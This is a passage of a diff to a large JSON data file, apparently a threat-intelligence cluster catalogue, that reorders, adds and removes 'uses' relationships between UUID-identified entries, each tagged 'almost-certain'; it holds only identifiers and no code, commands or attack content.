"707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "efece7e8-e40b-49c2-9f84-c55c5c93d05c", @@ -19595,34 +22191,6 @@ ] }, "related": [ - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ @@ -19630,41 +22198,6 @@ ], "type": "uses" }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ @@ -19673,7 +22206,14 @@ "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19686,6 +22226,27 @@ ], "type": "uses" }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ @@ -19693,12 +22254,54 @@ ], "type": "uses" }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "069af411-9b24-4e85-b26c-623d035bbe84", @@ -19729,7 +22332,7 @@ "type": "uses" }, { - "dest-uuid": "76c12fc8-a4eb-45d6-a3b7-e371a7248f69", + "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19743,14 +22346,14 @@ "type": "uses" }, { - "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "dest-uuid": "c5089859-b21f-40a3-8be4-63e381b8b1c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "c5089859-b21f-40a3-8be4-63e381b8b1c0", + "dest-uuid": "76c12fc8-a4eb-45d6-a3b7-e371a7248f69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19777,6 +22380,20 @@ ] }, "related": [ + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", "tags": [ @@ -19792,7 +22409,14 @@ "type": "uses" }, { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19805,6 +22429,13 @@ ], "type": "uses" }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ @@ -19813,21 +22444,7 @@ "type": "uses" }, { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19841,7 +22458,14 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19855,7 +22479,42 @@ "type": "uses" }, { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19875,62 +22534,6 @@ ], "type": "uses" }, - { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ @@ -19959,21 +22562,14 @@ }, "related": [ { - "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", + "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19987,14 +22583,21 @@ "type": "uses" }, { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", + "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20021,35 +22624,28 @@ }, "related": [ { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20063,7 +22659,42 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20084,49 +22715,7 @@ "type": "uses" }, { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20140,14 +22729,28 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20181,7 +22784,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20195,14 +22798,7 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20216,7 +22812,14 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20243,21 +22846,14 @@ }, "related": [ { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20277,6 +22873,13 @@ ], "type": "uses" }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ @@ -20285,14 +22888,14 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20306,7 +22909,7 @@ "type": "uses" }, { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20333,14 +22936,7 @@ }, "related": [ { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20354,7 +22950,14 @@ "type": "uses" }, { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20389,14 +22992,7 @@ }, "related": [ { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20410,42 +23006,14 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20459,14 +23027,28 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20494,7 +23076,14 @@ "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20507,12 +23096,26 @@ ], "type": "uses" }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "8e101fdd-9f7f-4916-bb04-6bd9e94c129c", @@ -20534,6 +23137,48 @@ ] }, "related": [ + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -20548,34 +23193,6 @@ ], "type": "uses" }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ @@ -20589,20 +23206,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "53a42597-1974-4b8e-84fd-3675e8992053", @@ -20625,13 +23228,6 @@ ] }, "related": [ - { - "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -20639,6 +23235,20 @@ ], "type": "uses" }, + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ @@ -20646,6 +23256,13 @@ ], "type": "uses" }, + { + "dest-uuid": "9e09ddb2-1746-4448-9cad-7f8b41777d6d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ @@ -20660,13 +23277,6 @@ ], "type": "uses" }, - { - "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ @@ -20681,20 +23291,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ @@ -20703,7 +23299,7 @@ "type": "uses" }, { - "dest-uuid": "9e09ddb2-1746-4448-9cad-7f8b41777d6d", + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20717,14 +23313,21 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "53bfc8bf-8f76-4cd7-8958-49a884ddb3ee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "53bfc8bf-8f76-4cd7-8958-49a884ddb3ee", + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20758,14 +23361,35 @@ }, "related": [ { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + 